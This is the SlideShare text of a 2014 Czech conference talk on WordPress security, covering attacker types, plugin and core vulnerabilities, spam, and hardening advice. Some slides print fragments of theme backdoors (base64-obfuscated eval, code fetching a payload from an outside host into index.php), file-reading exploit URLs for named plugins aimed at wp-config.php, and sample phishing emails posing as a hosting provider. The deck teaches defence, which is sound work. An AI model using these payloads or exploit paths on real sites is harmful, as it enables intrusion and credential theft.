SlideShare uma empresa Scribd logo

Jak si (ne)nechat hacknout Wordpress stránky

Transferir como PPTX, PDF
Vladimír Smitka
Vladimír Smitka

Slidy z přednášky o bezpečnostni Wordpressu na 3. WP konferenci. Kdo je útočník, jaké jsou jeho možnosti a jak se mu bránit. Další materiály se objeví na http://edu.lynt.cz

Internet
1 de 40
Jak si (ne)nechat hacknout Wordpress stránky Vláďa Smitka vladimir.smitka@lynt.cz @smitka (ale skoro nic nepíšu) Lynt services s.r.o. http://lynt.cz 22. 9. 2014 1
BEZPEČNOST VE WORDPRESS Slide z prezentace Michala Kubíčka – http://michalkubicek.cz http://lynt.cz
5 nejlepších rad Aktualizujte Zálohujte Používejte bezpečnostní plugin Buďte opatrní * Smažte co nepotřebujete a nedávejte světu moc informací. http://lynt.cz 22. 9. 2014 3
Bezpečnostní problém? Můžeme si za to sami!!! http://lynt.cz 22. 9. 2014 4
Kdo, co, jak a proč Kdo se na nás pokouší zaútočit? Co nám udělá? Jak to udělá? Proč to ***** dělá? http://lynt.cz 22. 9. 2014 5
Kdo, co, jak a proč Kde se berou? např. infikované počítače (zombie v botnetu), jiné infikované weby… http://lynt.cz Roboti Zkusí pár zranitelností, pár hesel, když se to nepovede, tak jdou pryč. Cíle vybírají náhodně. 22. 9. 2014 6
Kdo, co, jak a proč Najdou si zranitelné oběti, např. přes Google hacking (Google Dork). Zkouší všechno co umí. Když se to nepovede, tak jdou většinou dál. Je jim vcelku jedno kdo je cíl. http://lynt.cz Anonymní hackeři 22. 9. 2014 7
Kdo, co, jak a proč Chtějí váš konkrétní web. Zjišťují mnoho informací. Zkouší všechno, co umí. Když se to nepovede, tak se vrátí jakmile se objeví další zranitelnost, nebo hledají jiné cesty – phishing, malware… Kde se berou? Může to být konkurence – i nepřímá. Hodí jim odkaz z vašeho webu, nebo info o návštěvnících http://lynt.cz Cílení hackeři 22. 9. 2014 8
Kdo, co, jak a proč Photo by Lisa, CC BY-SA 2.0 Bez technických znalostí, využijí dostupný exploit (program), často je samotné nakazí  http://lynt.cz Děti script kiddies 22. 9. 2014 9
Kdo, co, jak a proč Cizí kód Vloží spamové odkazy, reklamu, přesměrování Nechají návštěvníky stahovat malware Použijí web na DDOS a jiné útoky Krádež informací Získají osobní informace uživatelů webu Omezení provozu Odstaví web/server (DOS) http://lynt.cz 22. 9. 2014 10
Kdo, co, jak a proč Bezpečnostní chyba v pluginech a šablonách Bezpečnostní chyba v jádru WP Brutal force útok na Admin Spam z komentářů (+pingbacky) Odchytnutí hesla a cookie Z jiných webů na hostingu Útok oklikou – phishing, malware (keylogger, uložené heslo FTP) http://lynt.cz 22. 9. 2014 11
Kdo, co, jak a proč Photo by 401(K) 2012, CC BY-SA 2.0 Přímé peníze z reklamy. Získání zpětných odkazů. Infikování počítačů – tvorba botnetu – pronájem/těžení bitcoinů. Odstavení/získání důvěrných info konkurence. Ukázání technických dovedností a jejich následný pronájem. http://lynt.cz 22. 9. 2014 12
Pluginy a šablony Můžou prakticky všechno – vyžadují zvýšenou pozornost, pravidelné aktualizace a mazání nepotřebných – soubory neaktivního pluginu stále mohou obsahovat zranitelnosti. Mohou obsahovat vědomé a nevědomé bezpečnostní problémy. Vědomé Můžete stáhnout šablonu/plugin z nějakého nedůvěryhodného zdroje a ten může obsahovat překvapení. Torrent, Uložto atd. nejsou důvěryhodné zdroje  Nevědomé Prostě chyba, snaha přinést uživateli pěknou funkci s malým úsilím. Nejčastěji se šikovným dotazem podaří stáhnout zajímavý soubor (wp-config…), nebo naopak nahrát svůj zajímavý soubor. Mohou být špatně ošetřené uživatelské vstupy a povede se vykonat nějaký kód (PHP nebo JavaScript). http://lynt.cz To, že za plugin platím, neznamená, že je důvěryhodný. 22. 9. 2014 13 Photo by Wikipedia
Překvapení <?php eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb…));?> <?php $code_txt = 'http://javaterm.com/r9.txt'; … if(is_dir($path.'/wp-content')…){ $code= file_get_contents($code_txt); $index_path = $path.'/index.php'; if(file_put_contents($index_path, $code)){…} eval(gzinflate(base64_decode(…))) preg_replace("/.+/e","x65x76x61x6Cx28x67...) ob_start(…); … if (!preg_match('%(http|curl|google|yahoo|yandex|ya|bing|bot|crawl|lynx|SiteUptime |Spider|ia_archiver|AOL|slurp|msn)%i', $agent, $ret))… http://lynt.cz 404.php 22. 9. 2014 14
Chyby Download ShortCode - LFI (CVE-2014-5465) /wp-content/force-download.php?file=../wp-config.php $file = $_GET['file']; if(isset($file)) { http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php Revolution slider - LFI LFI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php MailPoet – File Dropper Ověření uploadu pomocí hooku add_action( 'admin_init', ‚…' ) – pouští se při spuštění stránky v administraci – např. admin-post.php – uploader „šablony“ emailu v zip OptimizePress Theme – File Dropper /wp-content/themes/OptimizePress/lib/admin/media-upload.php – vlastní uploader bez dostatečného zabezpečení http://lynt.cz include("pages/$file"); } else { include("index.php"); } 22. 9. 2014 15
Chyby v jádře Již je toho hodně vyladěno, ale určitě mnoho zbývá  Kritické se neobjevují tak často, většinou se jedná o unik informací nebo DOS. Po odhalení je oprava často rychle dostupná a díku auto-update i nasazená. Chyba v XML-RPC (týkala se i Drupalu) – speciální XML soubor dokázal vygenerovat několika GB požadavek – došlo k vyčerpání prostředků. V základu není limitován počet chybných přihlášení (lze řešit pluginem) Lze jednoduše získat uživatelské jméno: http://www.justit.cz/wordpress/?author=2 => http://www.justit.cz/wordpress/author/ddoc/ RewriteRule ^author/(.*)$ http://jdi-nekam.com/ [R,L] http://lynt.cz Chyby, které jsou vlastnostmi: 22. 9. 2014 16
Spam Nejjednodušší cesta – přidat komentář, když je to možné. Když to není možné, přesvědčit se, zda to opravdu není možné: /?p=1 => možná admin nesmazal první Hello World příspěvek, který má povoleny komentáře (globální vypnutí komentářů se vztahuje pouze na nové příspěvky) Můžeme uzavřít komentáře po X dnech stáří článku. function lynt_disable_comments_on_pages( $file ) { return is_page() ? __FILE__ : $file; } add_filter( 'comments_template', 'lynt_disable_comments_on_pages'); http://lynt.cz Vypnutí komentářů na stránkách: 22. 9. 2014 17
Spam – ale já komentáře chci Použití antispamového filtru: Akismet • předinstalovaný v základu, chce drobný poplatek • používá kontextové filtrování a reputaci IP adresy • někdy může dojít k zablokování regulérního příspěvku HoneyPot • nastraží políčko, které vyplní jen robot, • komentář rovnou odstraní • pokud se jedná o cílenější spamování, můžou spamy projít • Pluginy: NoSpamNX, Honeypot Comments Tyto řešení se nevztahují na pingbacky, pokud je nechci, tak je dobré je vypnout. http://lynt.cz Captcha • nemám ji rád  22. 9. 2014 18
Bezpečnostní problém? Můžeme si za to sami!!! http://lynt.cz 22. 9. 2014 19
Člověk je nejslabší článek Dáváme slabá hesla a používáme uživatelské jméno admin. Hesla si nešifrovaně ukládáme a používáme je na více webech. Doporučuji: nainstalovat WP klidně s uživatelem admin, nainstalovat si vše potřebné, založit nového uživatele s právy admina, a starého smazat. Používat správce hesel např. KeePass a využívat jeho generátor hesel. Přihlašovací heslo není složité odchytnout. Není vhodné se přihlašovat z neznámých sítí (wifi i kabelových), pokud nemám SSL v administraci. Proč vlastně nezapnout SSL pro celý web? http://lynt.cz define('FORCE_SSL_ADMIN', true); define('FORCE_SSL_LOGIN', true); 22. 9. 2014 20
Člověk je nejslabší článek http://lynt.cz 22. 9. 2014 21
Člověk je nejslabší článek http://lynt.cz 22. 9. 2014 22
Člověk je nejslabší článek S tímto cookie se mohu přihlásit i bez znalosti hesla cookie wordpress_logged_in_...se posílá stále, nejen při přístupu do adminu http://lynt.cz 22. 9. 2014 23
Člověk je nejslabší článek Předmět: Bezpečnostní problém WEDOS Hosting [8614001612] Datum: Wed, 20 Sep 2014 14:32:48 +0200 Od: WEDOS <hosting@wedos.com> Komu: <ty> Na Vaší webové prezentaci tvujweb.cz založené na redakčním systému Wordpress byla zjištěna závažná bezpečnostní chyba v pluginu Skvělej Plugin, které umožňuje útočníkovi získat plnou kontrolu nad Vaším webem a následně útočit na další weby. Oficiální oprava zatím není k dispozici. Naši specialisté však mohou chybu opravit ručně. K tomu potřebujeme Vaše přihlašovací údaje do administrace Wordpress. Zašlete nám je prosím obratem, ať můžeme zabránit dalším útokům. V opačném případě budeme bohužel nuceni Vaši webovou prezentaci pozastavit. http://lynt.cz Vážený zákazníku, WEDOS Internet, a.s. 22. 9. 2014 24
Člověk je nejslabší článek Předmět: Bezpečnostní problém WEDOS Hosting [8614001612] Datum: Wed, 20 Sep 2014 14:32:48 +0200 Od: WEDOS <hosting@wedos.com> Komu: <ty> Na Vaší webové prezentaci tvujweb.cz založené na redakčním systému Wordpress byl zjištěna škodlivý kód, který masivně útočí na další weby a infikuje návštěvníky. Neprodleně nainstalujte náš antivirový plugin Wedos-WP-Antivir, který naleznete v příloze i s návodem k instalaci. V opačném případě budeme bohužel nuceni Vaši webovou prezentaci pozastavit. http://lynt.cz Vážený zákazníku, WEDOS Internet, a.s. 22. 9. 2014 25
Člověk je nejslabší článek Jste si jistí, že se obezřetně chovají i ostatní uživatelé, kteří mají přístup k webu? I získání neadministrátorského účtu může mít velké důsledky – upload souborů, vkládání obsahu. Uživatelské role Administrator a Editor mohou standardně vkládat do komentářů JavaScript. http://lynt.cz Jste si jistí, že se chováte obezřetně? 22. 9. 2014 26
Co mi mohou udělat okolní weby? Pokud není hosting správně nakonfigurován, může napadený web přistupovat k souborům i na ostatních webech. Nejčastější metody oddělení webů: Ze stejné IP adresy je rozesílán spam, stahován malware – dostane se na blacklisty http://lynt.cz Přímé ohrožení: • Vlastní uživatelé • Open_basedir • Různé typy chroot Nepřímé ohrožení: 22. 9. 2014 27
Co s tím vším mám dělat? http://lynt.cz 22. 9. 2014 28
Aktualizujte Problém č. 1 – jak se dozvědět o aktualizaci? • WP Updates Notifier – při dostupném updatu zašle email • Více webů lze udržovat hromadně pomocí InfiniteWP • Sledovat informace o aktuálních hrozbách (zdroje na konci prezentace) Problém č. 2 – nerozbije se to? Pravděpodobně někdy ano, ale lepší než bezpečnostní rizika Jádro s ve WP 3.8+ aktualizuje samo define( 'WP_AUTO_UPDATE_CORE', true ); - povolí i majoritní updaty Automatická aktualizace pluginů a šablon zapnout: add_filter( 'auto_update_plugin', '__return_true' ); add_filter( 'auto_update_theme', '__return_true' ); Pozor na vlastní úpravy. V případě šablon je vhodné si udělat odvozenou šablonu. S použitím menšího množství pluginů klesnou nároky na správu i bezpečnostní rizika. http://lynt.cz 22. 9. 2014 29
Zálohujte Po případném napadení bude možné se vrátit k neinfikované verzi. Pozor, kam se záloha ukládá. Řešení hostingu/ruční záloha DB a souborů Zálohovací plugin: např. BackWPup, BackupBuddy Součást některých dalších pluginů a nástrojů (InfiniteWP) „Zálohování je alfou a omegou práce na počítači.“ http://lynt.cz Photo by Sean MacEnte, CC BY 2.0 22. 9. 2014 30
Používejte bezpečnostní plugin Komplexnější řešení, které opraví některé zneužitelné díry, omezí brutal force útoky na administraci, najdou podezřelý kód. Vyberte si svého favorita: • Wordfence • iThemes Security • All in One WP security http://lynt.cz 22. 9. 2014 31
Wordfence http://lynt.cz Realtime scanner • Pokouší se zjistit, zda je návštěvník bot nebo člověk a umí dle toho nastavovat politiky • Blokuje přístupy do administrace • Scanuje soubory na podezřelý kód • Umí cachování pro dorovnání výkonnostní ztráty • Notifikuje při změnách souborů • Prémiové funkce (39$/rok): přihlašování pomocí SMS, vzdálené scany, antispam v komentářích 22. 9. 2014 32
iThemes Security http://lynt.cz Průvodce bezpečností • Blokuje přístupy do administrace • Blokuje IP adresy (má i distribuovaný seznam) • Zálohuje databázi • Hledá malware v souborech • Detekuje zvýšené množství 404 • Monitoruje změny v souborech • Přesměruje přihlašování • Správně nastaví práva k souborům a složkám • Umí změnit prefix databáze • Další nástroje od vydavatele (Sync, BackupBuddy,…) 22. 9. 2014 33
All in One WP Security Vše, co potřebujete na pár kliků • Podobné funkce jako iThemes Security • Někde podrobnější nastavení • + umožňuje „zakázat“ kopírování obsahu • + zákaz používání obrázků na jiných webech • + captcha do komentářů a login page (sem umí dát i honeypot) iThemes více radí, co máte udělat. http://lynt.cz 22. 9. 2014 34
Co mohu udělat sám • Změnit prefix DB při instalaci • Zákaz PHP v /wp-content/uploads/ - .htaccess • Zakázání XML-RPC - .htaccess (příp. add_filter('xmlrpc_enabled', '__return_false');) • Přidat další ochranu k wp-login (http auth, 2 fázová autentifikace) - .htaccess • Hlídat referer (přihlašování, komentáře) - .htaccess • Zkontrolovat práva složek a souborů • Zamaskovat verzi WP a ServerSignature - .htaccess, wp-config.php • disable_functions (exec, passthru,shell_exec, system, proc_open, popen, eval – zde může něco přestat fungovat – jetpack, zip,…) – php.ini • allow_url_fopen, allow_url_include – php.ini/ .htaccess • Posunout wp-config.php o úroveň výše – otázka, jaký to má smysl (doporučení vzniklo chybou v systému Plesk, který deaktivoval PHP a zdrojové kódy tak byly přímo dostupné), lepší je dát wp-config do paralelní složky a includovat ho http://lynt.cz 22. 9. 2014 35
.htaccess http://lynt.cz Globální .htaccess ServerSignature off #zakazani xml-rpc RedirectMatch 403 /(.*)/xmlrpc.php$ #kontrola refereru RewriteCond %{REQUEST_METHOD} POST RewriteCond %{REQUEST_URI} .(wp-comments-post|wp-login).php* RewriteCond %{HTTP_REFERER} !.*example.com.* [OR] RewriteCond %{HTTP_USER_AGENT} ^$ RewriteRule ^(.*)$ - [F,L] #zákaz přístupu k některým souborům <FilesMatch "license.txt|wp-config-sample.php|readme.html|.htaccess|wp-config.php"> Order allow,deny Deny from all </FilesMatch> .htaccess ve složce /wp-content/uploads/ php_flag engine off Jiná možnost: <FilesMatch .php$> Order allow,deny Deny from all </FilesMatch> Další tipy (MySQL injection…): https://secure.rivalhost.com/knowledgebase/1037/htaccess-against-MySQL-injections- and-other-hacks.html 22. 9. 2014 36
Práva složek a souborů root directory 755 wp-includes/ 755 .htaccess 644 wp-admin/index.php 644 wp-admin/js/ 755 wp-content/themes/ 755 wp-content/plugins/ 755 wp-admin/ 755 wp-content/ 755 wp-config.php 644 http://lynt.cz z All in One WP Security 22. 9. 2014 37
Problematika DOS a DDOS • Částečně lze řešit pomocí cachovacího pluginu (WP-SuperCache) – některé útoky postupně např. vyčerpají počet povolených php procesů • Analýza botů ve Wordfence • Další řešení je použít službu typu CloudFlare/Incapsula (WAF – web application firewall) • Masivní útok může ucpat linku = záleží pak na technologiích poskytovatele http://lynt.cz 22. 9. 2014 38
Zdroje dalších informací • http://www.kyberbezpecnost.cz/ • http://packetstormsecurity.com/search/?q=wordpress – vhodné do http://lynt.cz RSS • http://blog.sucuri.net/ • https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress • http://codex.wordpress.org • https://github.com/b374k/b374k – nejčastěji uploadovaný nástroj útočníky • https://www.startssl.com – základní SSL certifikát zdarma • http://edu.lynt.cz/ – náš výukový portál, časem zde mohou být zajímavé informace 22. 9. 2014 39
A to je vše, přátelé. aktualizujte, zálohujte, používejte bezpečnostní plugin, buďte opatrní http://lynt.cz 22. 9. 2014 40

Recomendados

WordCamp Praha 2016 - Bezpečnost WordPress
WordCamp Praha 2016 - Bezpečnost WordPressWordCamp Praha 2016 - Bezpečnost WordPress
WordCamp Praha 2016 - Bezpečnost WordPressVladimír Smitka
 
Wordfence 2016
Wordfence 2016Wordfence 2016
Wordfence 2016Vladimír Smitka
 
Bezpečnost WordPress pro začátečníky
Bezpečnost WordPress pro začátečníkyBezpečnost WordPress pro začátečníky
Bezpečnost WordPress pro začátečníkyVladimír Smitka
 
Bezpečnost Wordpressu - 4. WP konference
Bezpečnost Wordpressu - 4. WP konferenceBezpečnost Wordpressu - 4. WP konference
Bezpečnost Wordpressu - 4. WP konferenceVladimír Smitka
 
Wordpress_DOD
Wordpress_DODWordpress_DOD
Wordpress_DODDoubry99
 
WordPress: Základy - bezpečnost 3x3
WordPress: Základy - bezpečnost 3x3WordPress: Základy - bezpečnost 3x3
WordPress: Základy - bezpečnost 3x3Vladimír Smitka
 
WordPress - základy bezpečnosti
WordPress - základy bezpečnostiWordPress - základy bezpečnosti
WordPress - základy bezpečnostiVladimír Smitka
 
Nejčastejší problémy WordPress webů
Nejčastejší problémy WordPress webůNejčastejší problémy WordPress webů
Nejčastejší problémy WordPress webůVladimír Smitka
 

Recomendados

WordCamp Praha 2016 - Bezpečnost WordPress
WordCamp Praha 2016 - Bezpečnost WordPressWordCamp Praha 2016 - Bezpečnost WordPress
WordCamp Praha 2016 - Bezpečnost WordPressVladimír Smitka
 
Wordfence 2016
Wordfence 2016Wordfence 2016
Wordfence 2016Vladimír Smitka
 
Bezpečnost WordPress pro začátečníky
Bezpečnost WordPress pro začátečníkyBezpečnost WordPress pro začátečníky
Bezpečnost WordPress pro začátečníkyVladimír Smitka
 
Bezpečnost Wordpressu - 4. WP konference
Bezpečnost Wordpressu - 4. WP konferenceBezpečnost Wordpressu - 4. WP konference
Bezpečnost Wordpressu - 4. WP konferenceVladimír Smitka
 
Wordpress_DOD
Wordpress_DODWordpress_DOD
Wordpress_DODDoubry99
 
WordPress: Základy - bezpečnost 3x3
WordPress: Základy - bezpečnost 3x3WordPress: Základy - bezpečnost 3x3
WordPress: Základy - bezpečnost 3x3Vladimír Smitka
 
WordPress - základy bezpečnosti
WordPress - základy bezpečnostiWordPress - základy bezpečnosti
WordPress - základy bezpečnostiVladimír Smitka
 
Nejčastejší problémy WordPress webů
Nejčastejší problémy WordPress webůNejčastejší problémy WordPress webů
Nejčastejší problémy WordPress webůVladimír Smitka
 
WP výkon a jeho profilování
WP výkon a jeho profilováníWP výkon a jeho profilování
WP výkon a jeho profilováníVladimír Smitka
 
Výkon WordPress
Výkon WordPressVýkon WordPress
Výkon WordPressVladimír Smitka
 
Instalace WordPress
Instalace WordPressInstalace WordPress
Instalace WordPressVladimír Smitka
 
WordCamp Brno 2017 - rychlý a bezpečný web
WordCamp Brno 2017 - rychlý a bezpečný webWordCamp Brno 2017 - rychlý a bezpečný web
WordCamp Brno 2017 - rychlý a bezpečný webVladimír Smitka
 
Základní pluginy pro WordPress
Základní pluginy pro WordPressZákladní pluginy pro WordPress
Základní pluginy pro WordPressRadek Kucera
 
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015Bezpečnost WP, tipy pro každého - wordCamp Praha 2015
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015Vladimír Smitka
 
Sysops tipy pro lepší WP
Sysops tipy pro lepší WPSysops tipy pro lepší WP
Sysops tipy pro lepší WPVladimír Smitka
 
Najčastejšie problémy WordPress webov
Najčastejšie problémy WordPress webovNajčastejšie problémy WordPress webov
Najčastejšie problémy WordPress webovVladimír Smitka
 
WordPress šablony a rychlost načítání (WordCamp Praha 2017)
WordPress šablony a rychlost načítání (WordCamp Praha 2017)WordPress šablony a rychlost načítání (WordCamp Praha 2017)
WordPress šablony a rychlost načítání (WordCamp Praha 2017)Martin Michálek
 
WordCamp Bratislava 2019 - Cache!
WordCamp Bratislava 2019 - Cache!WordCamp Bratislava 2019 - Cache!
WordCamp Bratislava 2019 - Cache!Vladimír Smitka
 
Jak zlepšit zabezpečení čtvrtiny celého webu
Jak zlepšit zabezpečení čtvrtiny celého webuJak zlepšit zabezpečení čtvrtiny celého webu
Jak zlepšit zabezpečení čtvrtiny celého webuMichal Špaček
 
Google Tag Manager a analytika ve WordPress
Google Tag Manager a analytika ve WordPressGoogle Tag Manager a analytika ve WordPress
Google Tag Manager a analytika ve WordPressVladimír Smitka
 
Základní pluginy pro WordPress 25-6-2016
Základní pluginy pro WordPress 25-6-2016Základní pluginy pro WordPress 25-6-2016
Základní pluginy pro WordPress 25-6-2016Radek Kucera
 
Hesla a vícefaktorová autentizace ve WP
Hesla a vícefaktorová autentizace ve WPHesla a vícefaktorová autentizace ve WP
Hesla a vícefaktorová autentizace ve WPVladimír Smitka
 
Co musíte udělat po instalaci WordPressu?, Vlastimil Ott
Co musíte udělat po instalaci WordPressu?, Vlastimil OttCo musíte udělat po instalaci WordPressu?, Vlastimil Ott
Co musíte udělat po instalaci WordPressu?, Vlastimil OttLiberix, o.p.s.
 
WordPress ve školském prostředí
WordPress ve školském prostředíWordPress ve školském prostředí
WordPress ve školském prostředíVlastimil Ott
 
XSS PHP CSP ETC OMG WTF BBQ
XSS PHP CSP ETC OMG WTF BBQXSS PHP CSP ETC OMG WTF BBQ
XSS PHP CSP ETC OMG WTF BBQMichal Špaček
 
Website Security & WordPress (Peter Gramantik)
Website Security & WordPress (Peter Gramantik)Website Security & WordPress (Peter Gramantik)
Website Security & WordPress (Peter Gramantik)wcsk
 
Bezpečnost e-shopů (HTTPS, XSS, CSP)
Bezpečnost e-shopů (HTTPS, XSS, CSP)Bezpečnost e-shopů (HTTPS, XSS, CSP)
Bezpečnost e-shopů (HTTPS, XSS, CSP)Michal Špaček
 
WordCamp Prague 2014 - Website security cz
WordCamp Prague 2014 - Website security czWordCamp Prague 2014 - Website security cz
WordCamp Prague 2014 - Website security czpeter_sucuri
 
Wordpress multisite
Wordpress multisiteWordpress multisite
Wordpress multisiteKamil Kuchta
 
Je WooCommerce vhodná pro eshop?
Je WooCommerce vhodná pro eshop?Je WooCommerce vhodná pro eshop?
Je WooCommerce vhodná pro eshop?Vladislav Musílek
 

Mais conteúdo relacionado

Mais procurados

WP výkon a jeho profilování
WP výkon a jeho profilováníWP výkon a jeho profilování
WP výkon a jeho profilováníVladimír Smitka
 
WordCamp Brno 2017 - rychlý a bezpečný web
WordCamp Brno 2017 - rychlý a bezpečný webWordCamp Brno 2017 - rychlý a bezpečný web
WordCamp Brno 2017 - rychlý a bezpečný webVladimír Smitka
 
Základní pluginy pro WordPress
Základní pluginy pro WordPressZákladní pluginy pro WordPress
Základní pluginy pro WordPressRadek Kucera
 
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015Bezpečnost WP, tipy pro každého - wordCamp Praha 2015
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015Vladimír Smitka
 
Sysops tipy pro lepší WP
Sysops tipy pro lepší WPSysops tipy pro lepší WP
Sysops tipy pro lepší WPVladimír Smitka
 
Najčastejšie problémy WordPress webov
Najčastejšie problémy WordPress webovNajčastejšie problémy WordPress webov
Najčastejšie problémy WordPress webovVladimír Smitka
 
WordPress šablony a rychlost načítání (WordCamp Praha 2017)
WordPress šablony a rychlost načítání (WordCamp Praha 2017)WordPress šablony a rychlost načítání (WordCamp Praha 2017)
WordPress šablony a rychlost načítání (WordCamp Praha 2017)Martin Michálek
 
WordCamp Bratislava 2019 - Cache!
WordCamp Bratislava 2019 - Cache!WordCamp Bratislava 2019 - Cache!
WordCamp Bratislava 2019 - Cache!Vladimír Smitka
 
Jak zlepšit zabezpečení čtvrtiny celého webu
Jak zlepšit zabezpečení čtvrtiny celého webuJak zlepšit zabezpečení čtvrtiny celého webu
Jak zlepšit zabezpečení čtvrtiny celého webuMichal Špaček
 
Google Tag Manager a analytika ve WordPress
Google Tag Manager a analytika ve WordPressGoogle Tag Manager a analytika ve WordPress
Google Tag Manager a analytika ve WordPressVladimír Smitka
 
Základní pluginy pro WordPress 25-6-2016
Základní pluginy pro WordPress 25-6-2016Základní pluginy pro WordPress 25-6-2016
Základní pluginy pro WordPress 25-6-2016Radek Kucera
 
Hesla a vícefaktorová autentizace ve WP
Hesla a vícefaktorová autentizace ve WPHesla a vícefaktorová autentizace ve WP
Hesla a vícefaktorová autentizace ve WPVladimír Smitka
 
Co musíte udělat po instalaci WordPressu?, Vlastimil Ott
Co musíte udělat po instalaci WordPressu?, Vlastimil OttCo musíte udělat po instalaci WordPressu?, Vlastimil Ott
Co musíte udělat po instalaci WordPressu?, Vlastimil OttLiberix, o.p.s.
 
WordPress ve školském prostředí
WordPress ve školském prostředíWordPress ve školském prostředí
WordPress ve školském prostředíVlastimil Ott
 
XSS PHP CSP ETC OMG WTF BBQ
XSS PHP CSP ETC OMG WTF BBQXSS PHP CSP ETC OMG WTF BBQ
XSS PHP CSP ETC OMG WTF BBQMichal Špaček
 
Website Security & WordPress (Peter Gramantik)
Website Security & WordPress (Peter Gramantik)Website Security & WordPress (Peter Gramantik)
Website Security & WordPress (Peter Gramantik)wcsk
 
Bezpečnost e-shopů (HTTPS, XSS, CSP)
Bezpečnost e-shopů (HTTPS, XSS, CSP)Bezpečnost e-shopů (HTTPS, XSS, CSP)
Bezpečnost e-shopů (HTTPS, XSS, CSP)Michal Špaček
 
WordCamp Prague 2014 - Website security cz
WordCamp Prague 2014 - Website security czWordCamp Prague 2014 - Website security cz
WordCamp Prague 2014 - Website security czpeter_sucuri
 

Mais procurados (20)

WP výkon a jeho profilování
WP výkon a jeho profilováníWP výkon a jeho profilování
WP výkon a jeho profilování
 
Výkon WordPress
Výkon WordPressVýkon WordPress
Výkon WordPress
 
Instalace WordPress
Instalace WordPressInstalace WordPress
Instalace WordPress
 
WordCamp Brno 2017 - rychlý a bezpečný web
WordCamp Brno 2017 - rychlý a bezpečný webWordCamp Brno 2017 - rychlý a bezpečný web
WordCamp Brno 2017 - rychlý a bezpečný web
 
Základní pluginy pro WordPress
Základní pluginy pro WordPressZákladní pluginy pro WordPress
Základní pluginy pro WordPress
 
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015Bezpečnost WP, tipy pro každého - wordCamp Praha 2015
Bezpečnost WP, tipy pro každého - wordCamp Praha 2015
 
Sysops tipy pro lepší WP
Sysops tipy pro lepší WPSysops tipy pro lepší WP
Sysops tipy pro lepší WP
 
Najčastejšie problémy WordPress webov
Najčastejšie problémy WordPress webovNajčastejšie problémy WordPress webov
Najčastejšie problémy WordPress webov
 
WordPress šablony a rychlost načítání (WordCamp Praha 2017)
WordPress šablony a rychlost načítání (WordCamp Praha 2017)WordPress šablony a rychlost načítání (WordCamp Praha 2017)
WordPress šablony a rychlost načítání (WordCamp Praha 2017)
 
WordCamp Bratislava 2019 - Cache!
WordCamp Bratislava 2019 - Cache!WordCamp Bratislava 2019 - Cache!
WordCamp Bratislava 2019 - Cache!
 
Jak zlepšit zabezpečení čtvrtiny celého webu
Jak zlepšit zabezpečení čtvrtiny celého webuJak zlepšit zabezpečení čtvrtiny celého webu
Jak zlepšit zabezpečení čtvrtiny celého webu
 
Google Tag Manager a analytika ve WordPress
Google Tag Manager a analytika ve WordPressGoogle Tag Manager a analytika ve WordPress
Google Tag Manager a analytika ve WordPress
 
Základní pluginy pro WordPress 25-6-2016
Základní pluginy pro WordPress 25-6-2016Základní pluginy pro WordPress 25-6-2016
Základní pluginy pro WordPress 25-6-2016
 
Hesla a vícefaktorová autentizace ve WP
Hesla a vícefaktorová autentizace ve WPHesla a vícefaktorová autentizace ve WP
Hesla a vícefaktorová autentizace ve WP
 
Co musíte udělat po instalaci WordPressu?, Vlastimil Ott
Co musíte udělat po instalaci WordPressu?, Vlastimil OttCo musíte udělat po instalaci WordPressu?, Vlastimil Ott
Co musíte udělat po instalaci WordPressu?, Vlastimil Ott
 
WordPress ve školském prostředí
WordPress ve školském prostředíWordPress ve školském prostředí
WordPress ve školském prostředí
 
XSS PHP CSP ETC OMG WTF BBQ
XSS PHP CSP ETC OMG WTF BBQXSS PHP CSP ETC OMG WTF BBQ
XSS PHP CSP ETC OMG WTF BBQ
 
Website Security & WordPress (Peter Gramantik)
Website Security & WordPress (Peter Gramantik)Website Security & WordPress (Peter Gramantik)
Website Security & WordPress (Peter Gramantik)
 
Bezpečnost e-shopů (HTTPS, XSS, CSP)
Bezpečnost e-shopů (HTTPS, XSS, CSP)Bezpečnost e-shopů (HTTPS, XSS, CSP)
Bezpečnost e-shopů (HTTPS, XSS, CSP)
 
WordCamp Prague 2014 - Website security cz
WordCamp Prague 2014 - Website security czWordCamp Prague 2014 - Website security cz
WordCamp Prague 2014 - Website security cz
 

Destaque

Wordpress multisite
Wordpress multisiteWordpress multisite
Wordpress multisiteKamil Kuchta
 
Je WooCommerce vhodná pro eshop?
Je WooCommerce vhodná pro eshop?Je WooCommerce vhodná pro eshop?
Je WooCommerce vhodná pro eshop?Vladislav Musílek
 
5 otázek, když plánujete web
5 otázek, když plánujete web5 otázek, když plánujete web
5 otázek, když plánujete webPetr Bechyně
 
Email marketing na WordPress webu
Email marketing na WordPress webuEmail marketing na WordPress webu
Email marketing na WordPress webuTomáš Poner
 
Kampaň Strany zelených - přednáška v Bloku expertů, Zlín, 7. 11. 2013
Kampaň Strany zelených - přednáška v Bloku expertů, Zlín, 7. 11. 2013Kampaň Strany zelených - přednáška v Bloku expertů, Zlín, 7. 11. 2013
Kampaň Strany zelených - přednáška v Bloku expertů, Zlín, 7. 11. 2013Jenda Perla
 
Magický seminář - 6.11.2012
Magický seminář - 6.11.2012Magický seminář - 6.11.2012
Magický seminář - 6.11.2012Jarek Mikeš
 
Jak zvýšit obrat eshopu? Case studies www.svetcukraru.cz
Jak zvýšit obrat eshopu? Case studies www.svetcukraru.czJak zvýšit obrat eshopu? Case studies www.svetcukraru.cz
Jak zvýšit obrat eshopu? Case studies www.svetcukraru.czMichal Kubicek
 
Materiály ze školení Facebook PPC reklam pro pokročilé
Materiály ze školení Facebook PPC reklam pro pokročiléMateriály ze školení Facebook PPC reklam pro pokročilé
Materiály ze školení Facebook PPC reklam pro pokročiléJindřich Fáborský
 
Marketing elektronických obchodů na sociálních sítích v roce 2013.
Marketing elektronických obchodů na sociálních sítích v roce 2013.Marketing elektronických obchodů na sociálních sítích v roce 2013.
Marketing elektronických obchodů na sociálních sítích v roce 2013.igloonet
 
Nejlepší reklamní kampaně 2013 a 2014
